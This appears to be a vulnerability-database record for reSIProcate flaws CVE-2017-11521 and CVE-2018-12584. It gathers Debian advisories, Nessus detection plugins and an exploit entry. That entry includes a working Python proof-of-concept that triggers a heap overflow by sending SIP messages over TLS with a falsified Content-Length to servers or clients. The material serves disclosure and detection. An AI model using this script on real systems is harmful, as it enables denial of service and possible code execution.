Package : resiprocate
Version : 1.8.5-4+deb7u1
CVE ID : CVE-2017-11521

CVE-2017-11521

    The SdpContents::Session::Medium::parse function in
    resip/stack/SdpContents.cxx in reSIProcate 1.10.2 allows remote
    attackers to cause a denial of service (memory consumption) by
    triggering many media connections.

For Debian 7 "Wheezy", these problems have been fixed in version
1.8.5-4+deb7u1.

We recommend that you upgrade your resiprocate packages.

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
preg(pattern:\"^(9)\\.[0-9]+\", string:release)) audit(AUDIT_OS_NOT, 'Debian 9.0', 'Debian ' + release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '9.0', 'prefix': 'librecon-1.11', 'reference': '1:1.11.0~beta1-3+deb9u2'},\n {'release': '9.0', 'prefix': 'librecon-1.11-dev', 'reference': '1:1.11.0~beta1-3+deb9u2'},\n {'release': '9.0', 'prefix': 'libresiprocate-1.11', 'reference': '1:1.11.0~beta1-3+deb9u2'},\n {'release': '9.0', 'prefix': 'libresiprocate-1.11-dev', 'reference': '1:1.11.0~beta1-3+deb9u2'},\n {'release': '9.0', 'prefix': 'libresiprocate-turn-client-1.11', 'reference': '1:1.11.0~beta1-3+deb9u2'},\n {'release': '9.0', 'prefix': 'libresiprocate-turn-client-1.11-dev', 'reference': '1:1.11.0~beta1-3+deb9u2'},\n {'release': '9.0', 'prefix': 'repro', 'reference': '1:1.11.0~beta1-3+deb9u2'},\n {'release': '9.0', 'prefix': 'resiprocate-turn-server', 'reference': '1:1.11.0~beta1-3+deb9u2'},\n {'release': '9.0', 'prefix': 'resiprocate-turn-server-psql', 'reference': '1:1.11.0~beta1-3+deb9u2'},\n {'release': '9.0', 'prefix': 'sipdialer', 'reference': '1:1.11.0~beta1-3+deb9u2'},\n {'release': '9.0', 'prefix': 'telepathy-resiprocate', 'reference': '1:1.11.0~beta1-3+deb9u2'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (release && prefix && reference) {\n if (deb_check(release:release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : deb_report_get()\n 
);\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'librecon-1.11 / librecon-1.11-dev / libresiprocate-1.11 / etc');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:47:35", "description": "CVE-2018-12584 A flaw in function ConnectionBase::preparseNewBytes of resip/stack/ConnectionBase.cxx has been detected, that allows remote attackers to cause a denial of service (buffer overflow) or possibly execute arbitrary code when TLS communication is enabled.\n\nCVE-2017-11521 A flaw in function SdpContents::Session::Medium::parse of resip/stack/SdpContents.cxx has been detected, that allows remote attackers to cause a denial of service (memory consumption) by triggering many media connections.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 1:1.9.7-5+deb8u1.\n\nWe recommend that you upgrade your resiprocate packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-07-25T00:00:00", "type": "nessus", "title": "Debian DLA-1439-1 : resiprocate security update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11521", "CVE-2018-12584"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:librecon-1.9", "p-cpe:/a:debian:debian_linux:librecon-1.9-dev", "p-cpe:/a:debian:debian_linux:libresiprocate-1.9", "p-cpe:/a:debian:debian_linux:libresiprocate-1.9-dev", "p-cpe:/a:debian:debian_linux:libresiprocate-turn-client-1.9", "p-cpe:/a:debian:debian_linux:libresiprocate-turn-client-1.9-dev", "p-cpe:/a:debian:debian_linux:repro", "p-cpe:/a:debian:debian_linux:resiprocate-turn-server", "p-cpe:/a:debian:debian_linux:sipdialer", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-1439.NASL", "href": "https://www.tenable.com/plugins/nessus/111311", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted 
from Debian Security Advisory DLA-1439-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111311);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-11521\", \"CVE-2018-12584\");\n\n script_name(english:\"Debian DLA-1439-1 : resiprocate security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2018-12584 A flaw in function ConnectionBase::preparseNewBytes of\nresip/stack/ConnectionBase.cxx has been detected, that allows remote\nattackers to cause a denial of service (buffer overflow) or possibly\nexecute arbitrary code when TLS communication is enabled.\n\nCVE-2017-11521 A flaw in function SdpContents::Session::Medium::parse\nof resip/stack/SdpContents.cxx has been detected, that allows remote\nattackers to cause a denial of service (memory consumption) by\ntriggering many media connections.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n1:1.9.7-5+deb8u1.\n\nWe recommend that you upgrade your resiprocate packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/07/msg00031.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/resiprocate\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:librecon-1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:librecon-1.9-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libresiprocate-1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libresiprocate-1.9-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libresiprocate-turn-client-1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libresiprocate-turn-client-1.9-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:repro\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:resiprocate-turn-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:sipdialer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"librecon-1.9\", reference:\"1:1.9.7-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"librecon-1.9-dev\", reference:\"1:1.9.7-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libresiprocate-1.9\", reference:\"1:1.9.7-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libresiprocate-1.9-dev\", reference:\"1:1.9.7-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libresiprocate-turn-client-1.9\", reference:\"1:1.9.7-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libresiprocate-turn-client-1.9-dev\", reference:\"1:1.9.7-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"repro\", reference:\"1:1.9.7-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"resiprocate-turn-server\", reference:\"1:1.9.7-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sipdialer\", reference:\"1:1.9.7-5+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse 
audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-01-27T14:25:16", "description": "The SdpContents::Session::Medium::parse function in\nresip/stack/SdpContents.cxx in reSIProcate 1.10.2 allows remote attackers\nto cause a denial of service (memory consumption) by triggering many media\nconnections.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=869404>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-07-22T00:00:00", "type": "ubuntucve", "title": "CVE-2017-11521", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11521"], "modified": "2017-07-22T00:00:00", "id": "UB:CVE-2017-11521", "href": "https://ubuntu.com/security/CVE-2017-11521", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2022-04-21T22:07:31", "description": "Package : resiprocate\nVersion : 1:1.9.7-5+deb8u1\nCVE ID : CVE-2017-11521 CVE-2018-12584\n\n\nCVE-2018-12584\n A flaw in function ConnectionBase::preparseNewBytes of\n resip/stack/ConnectionBase.cxx has been detected, that\n allows remote attackers 
to cause a denial of service\n (buffer overflow) or possibly execute arbitrary code\n when TLS communication is enabled.\n\nCVE-2017-11521\n A flaw in function SdpContents::Session::Medium::parse of\n resip/stack/SdpContents.cxx has been detected, that allows\n remote attackers to cause a denial of service (memory\n consumption) by triggering many media connections.\n\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n1:1.9.7-5+deb8u1.\n\nWe recommend that you upgrade your resiprocate packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-07-24T20:13:30", "type": "debian", "title": "[SECURITY] [DLA 1439-1] resiprocate security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11521", "CVE-2018-12584"], "modified": "2018-07-24T20:13:30", "id": "DEBIAN:DLA-1439-1:BD082", "href": "https://lists.debian.org/debian-lts-announce/2018/07/msg00031.html", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-23T20:06:34", "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2865-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Adrian Bunk\nDecember 29, 2021 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : resiprocate\nVersion : 1:1.11.0~beta1-3+deb9u2\nCVE ID : CVE-2017-11521 CVE-2018-12584\nDebian Bug : 869404 905495\n\nTwo vulnerabilities were fixed in the reSIProcate SIP stack.\n\nCVE-2017-11521\n\n The SdpContents::Session::Medium::parse function allowed remote \n attackers to cause a denial of service.\n\nCVE-2018-12584\n\n The ConnectionBase::preparseNewBytes function allowed remote \n attackers to cause a denial of service or possibly execute arbitrary \n code when TLS communication is enabled.\n\nFor Debian 9 stretch, these problems have been fixed in version\n1:1.11.0~beta1-3+deb9u2.\n\nWe recommend that you upgrade your resiprocate packages.\n\nFor the detailed security status of resiprocate please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/resiprocate\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-29T13:57:44", "type": "debian", "title": "[SECURITY] [DLA 2865-1] resiprocate security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11521", "CVE-2018-12584"], "modified": "2021-12-29T13:57:44", "id": "DEBIAN:DLA-2865-1:E2370", "href": "https://lists.debian.org/debian-lts-announce/2021/12/msg00029.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:06:07", "description": "\nreSIProcate 1.10.2 - Heap Overflow", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-09T00:00:00", "title": "reSIProcate 1.10.2 - Heap Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11521", "CVE-2018-12584"], "modified": "2018-08-09T00:00:00", "id": 
"EXPLOITPACK:D90E8A68ABB9C128F09E9C1AA57B32CC", "href": "", "sourceData": "'''\nCVE ID: CVE-2018-12584\n\nTIMELINE\n\n Bug report with test code sent to main reSIProcate developers: 2018-06-15\n Patch created by Scott Godin: 2018-06-18\n CVE ID assigned: 2018-06-19\n Patch committed to reSIProcate repository: 2018-06-21\n Advisory first published on website: 2018-06-22\n Advisory sent to Bugtraq mailing list: 2018-08-08\n\nDESCRIPTION\n\nA heap overflow can be triggered in the reSIProcate SIP stack when TLS is\nenabled.\nAbuse of this vulnerability may cause a denial of service of software using\nreSIProcate and may also lead to remote code execution.\nNo SIP user authentication is required to trigger the vulnerability on the\nclient or server side.\n\nTECHNICAL DETAILS\n\nThe file resiprocate/resip/stack/ConnectionBase.cxx contained the following\ncode fragment:\n\nbool\nConnectionBase::preparseNewBytes(int bytesRead)\n{\n/* ... */\n else if (mBufferPos == mBufferSize)\n {\n // .bwc. We've filled our buffer; go ahead and make more room.\n size_t newSize = resipMin(mBufferSize*3/2, contentLength);\n char* newBuffer = 0;\n try\n {\n newBuffer=new char[newSize];\n }\n catch(std::bad_alloc&)\n {\n ErrLog(>>\"Failed to alloc a buffer while receiving body!\");\n return false;\n }\n memcpy(newBuffer, mBuffer, mBufferSize);\n mBufferSize=newSize;\n delete [] mBuffer;\n mBuffer = newBuffer;\n }\n/* ... */\n}\n\nExecution of the code above could be triggered by sending a partial SIP\nmessage over TLS with a Content-Length header field, followed by sending a\npacket over TLS with its associated SIP message body. 
By setting the\nContent-Length field to a value that is lower than the length of the SIP\nmessage body which followed, a malicious user could trigger a heap buffer\noverflow.\n\nThe bug did not appear to be reproducible using TCP instead of TLS even when\nthe TCP packets were sent with delays between them.\n\nTEST CODE\n\nThe following Python script can be used to test the vulnerability of both\nserver and client software based on reSIProcate.\n'''\n\n#!/usr/bin/python3\n\n# reSIProcate through 1.10.2 SIP over TLS heap overflow bug test code\n# Written by Joachim De Zutter (2018)\n\nfrom socket import *\nfrom ssl import * # pip install pyopenssl\n\ndaemon_mode = False\n\n# server to test (in case daemon_mode = False)\nserver = \"\"\nport = 5061\n\n# server configuration (in case daemon_mode = True)\nserver_ip = \"xxx.xxx.xxx.xxx\"\nkeyfile = \"keyfile.pem\"\ncertfile = \"certfile.pem\"\n\nusername = \"test\"\nvia = \"192.168.13.37:31337\"\ncallid = \"LtCwMvc2C5tca58a5Ridwg..\"\ncseq = 1\n\ndef trigger_server_heap_overflow(connection):\n global username, server, via, cseq\n print(\"Triggering heap overflow!\")\n buffer_length = 100\n register_packet = \"REGISTER sip:\" + server + \" SIP/2.0\\x0d\\x0aVia:\nSIP/2.0/TCP \" + via + \"\\x0d\\x0aContact: <sip:\" + username + \"@\" + via\n+ \">\\x0d\\x0aTo: <sip:\" + username + \"@\" + server +\n\";transport=TCP>\\x0d\\x0aFrom: <sip:\" + username + \"@\" + server +\n\">\\x0d\\x0aCSeq: \" + \"%d\" % cseq + \" REGISTER\\x0d\\x0aExpires:\n600\\x0d\\x0aContent-Length: %ld\" % buffer_length + \"\\x0d\\x0a\\x0d\\x0a\"\n oversized_packet = buffer_length * \"A\" + 64 * \"B\"\n connection.send(register_packet.encode())\n cseq = cseq + 1\n connection.send(oversized_packet.encode())\n\ndef trigger_client_heap_overflow(connection):\n global username, via, callid, cseq\n print(\"Triggering heap overflow!\")\n buffer_length = 100\n content_length_packet = \"SIP/2.0 200 OK\\x0d\\x0aVia: 
SIP/2.0/TLS\n10.0.2.15:32703;branch=z9hG4bK-524287-1---c04a0ad2231e66ab;rport\\x0d\\x0aFrom:\n<sip:\" + username + \"@\" + via +\n\";transport=TLS>;tag=00649d4d\\x0d\\x0aTo: <sip:\" + username + \"@\" + via\n+ \";transport=TLS>\\x0d\\x0aCall-ID: \" + callid + \"\\x0d\\x0aCSeq: 2\nPUBLISH\\x0d\\x0aExpires: 600\\x0d\\x0aContent-Length: %ld\" %\nbuffer_length + \"\\x0d\\x0aSIP-ETag:\naf6079e42f65e7e2340e92565570e295\\x0d\\x0a\\x0d\\x0a\"\n oversized_packet = buffer_length * \"A\" + 64 * \"B\"\n connection.send(content_length_packet.encode())\n cseq = cseq + 1\n connection.send(oversized_packet.encode())\n connection.shutdown(SHUT_RDWR)\n connection.close()\n\ndef test_clients():\n global server_ip, keyfile, certfile\n server_socket=socket(AF_INET, SOCK_STREAM)\n server_socket.bind((server_ip, 5061))\n server_socket.listen(1)\n tls_server = wrap_socket(server_socket,\nssl_version=PROTOCOL_TLSv1, cert_reqs=CERT_NONE, server_side=True,\nkeyfile=keyfile, certfile=certfile)\n print(\"Server running!\")\n done = False\n while not done:\n connection, client_address= tls_server.accept()\n print(\"Connection from \" + client_address[0] + \":%d\" %\nclient_address[1])\n data_in = connection.recv(1024)\n if not data_in:\n done = True\n break\n message = data_in.decode()\n if \"SUBSCRIBE\" in message:\n print(\"Client sent SUBSCRIBE request\")\n trigger_client_heap_overflow(connection)\n\ndef test_server():\n global server, port\n context = create_default_context()\n context.check_hostname = False\n context.verify_mode = CERT_NONE\n tls_client = context.wrap_socket(socket(AF_INET), server_hostname=server)\n tls_client.connect((server, port))\n print(\"Connected!\")\n trigger_server_heap_overflow(tls_client)\n tls_client.shutdown(SHUT_RDWR)\n tls_client.close()\n\ndef main():\n global daemon_mode\n if daemon_mode:\n test_clients()\n else:\n test_server()\n\nif __name__ == \"__main__\":\n main()\n\n'''\nEXPLOITABILITY\n\nAt 
http://joachimdezutter.webredirect.org/CVE-2018-12584-exploitability.html\nthe exploitability of an affected version of repro on Windows XP Professional\nwith Service Pack 3 was examined, it was separated from this text because AVG\nWeb Shield considered the text to be a threat. Arbitrary code execution has\nproven to be possible and may be possible on other operating systems and\nsoftware based on affected versions of reSIProcate as well.\n\nSOLUTION\n\nA patch was created by Scott Godin, it was committed to the reSIProcate\nrepository at\n\nhttps://github.com/resiprocate/resiprocate/commit/2cb291191c93c7c4e371e22cb89805a5b31d6608\n\nThe following software based on reSIProcate contains a fix for the issue:\n\n3CX Phone System 15.5.13470.6 and higher\n\nFor Debian 8 \"Jessie\", CVE-2018-12584 and CVE-2017-11521 have been fixed in\nresiprocate package version 1:1.9.7-5+deb8u1\n(https://lists.debian.org/debian-lts-announce/2018/07/msg00031.html)\n\nDISCLAIMER\n\nThe information in this report is believed to be accurate at the time of\npublishing based on currently available information.\nUse of the information constitutes acceptance for use in an AS IS condition.\nThere are no warranties with regard to this information. 
Neither the author\nnor the publisher accepts any liability for any direct, indirect, or\nconsequential loss or damage arising from use of, or reliance on, this\ninformation.\n'''", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2018-08-09T09:58:49", "description": "", "cvss3": {}, "published": "2018-08-08T00:00:00", "type": "packetstorm", "title": "reSIProcate 1.10.2 Heap Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11521", "CVE-2018-12584"], "modified": "2018-08-08T00:00:00", "id": "PACKETSTORM:148856", "href": "https://packetstormsecurity.com/files/148856/reSIProcate-1.10.2-Heap-Overflow.html", "sourceData": "`CVE ID: CVE-2018-12584 \n \nTIMELINE \n \nBug report with test code sent to main reSIProcate developers: 2018-06-15 \nPatch created by Scott Godin: 2018-06-18 \nCVE ID assigned: 2018-06-19 \nPatch committed to reSIProcate repository: 2018-06-21 \nAdvisory first published on website: 2018-06-22 \nAdvisory sent to Bugtraq mailing list: 2018-08-08 \n \nDESCRIPTION \n \nA heap overflow can be triggered in the reSIProcate SIP stack when TLS is \nenabled. \nAbuse of this vulnerability may cause a denial of service of software using \nreSIProcate and may also lead to remote code execution. \nNo SIP user authentication is required to trigger the vulnerability on the \nclient or server side. \n \nTECHNICAL DETAILS \n \nThe file resiprocate/resip/stack/ConnectionBase.cxx contained the following \ncode fragment: \n \nbool \nConnectionBase::preparseNewBytes(int bytesRead) \n{ \n/* ... */ \nelse if (mBufferPos == mBufferSize) \n{ \n// .bwc. We've filled our buffer; go ahead and make more room. 
\nsize_t newSize = resipMin(mBufferSize*3/2, contentLength); \nchar* newBuffer = 0; \ntry \n{ \nnewBuffer=new char[newSize]; \n} \ncatch(std::bad_alloc&) \n{ \nErrLog(>>\"Failed to alloc a buffer while receiving body!\"); \nreturn false; \n} \nmemcpy(newBuffer, mBuffer, mBufferSize); \nmBufferSize=newSize; \ndelete [] mBuffer; \nmBuffer = newBuffer; \n} \n/* ... */ \n} \n \nExecution of the code above could be triggered by sending a partial SIP \nmessage over TLS with a Content-Length header field, followed by sending a \npacket over TLS with its associated SIP message body. By setting the \nContent-Length field to a value that is lower than the length of the SIP \nmessage body which followed, a malicious user could trigger a heap buffer \noverflow. \n \nThe bug did not appear to be reproducible using TCP instead of TLS even when \nthe TCP packets were sent with delays between them. \n \nTEST CODE \n \nThe following Python script can be used to test the vulnerability of both \nserver and client software based on reSIProcate. 
\n \n#!/usr/bin/python3 \n \n# reSIProcate through 1.10.2 SIP over TLS heap overflow bug test code \n# Written by Joachim De Zutter (2018) \n \nfrom socket import * \nfrom ssl import * # pip install pyopenssl \n \ndaemon_mode = False \n \n# server to test (in case daemon_mode = False) \nserver = \"\" \nport = 5061 \n \n# server configuration (in case daemon_mode = True) \nserver_ip = \"xxx.xxx.xxx.xxx\" \nkeyfile = \"keyfile.pem\" \ncertfile = \"certfile.pem\" \n \nusername = \"test\" \nvia = \"192.168.13.37:31337\" \ncallid = \"LtCwMvc2C5tca58a5Ridwg..\" \ncseq = 1 \n \ndef trigger_server_heap_overflow(connection): \nglobal username, server, via, cseq \nprint(\"Triggering heap overflow!\") \nbuffer_length = 100 \nregister_packet = \"REGISTER sip:\" + server + \" SIP/2.0\\x0d\\x0aVia: \nSIP/2.0/TCP \" + via + \"\\x0d\\x0aContact: <sip:\" + username + \"@\" + via \n+ \">\\x0d\\x0aTo: <sip:\" + username + \"@\" + server + \n\";transport=TCP>\\x0d\\x0aFrom: <sip:\" + username + \"@\" + server + \n\">\\x0d\\x0aCSeq: \" + \"%d\" % cseq + \" REGISTER\\x0d\\x0aExpires: \n600\\x0d\\x0aContent-Length: %ld\" % buffer_length + \"\\x0d\\x0a\\x0d\\x0a\" \noversized_packet = buffer_length * \"A\" + 64 * \"B\" 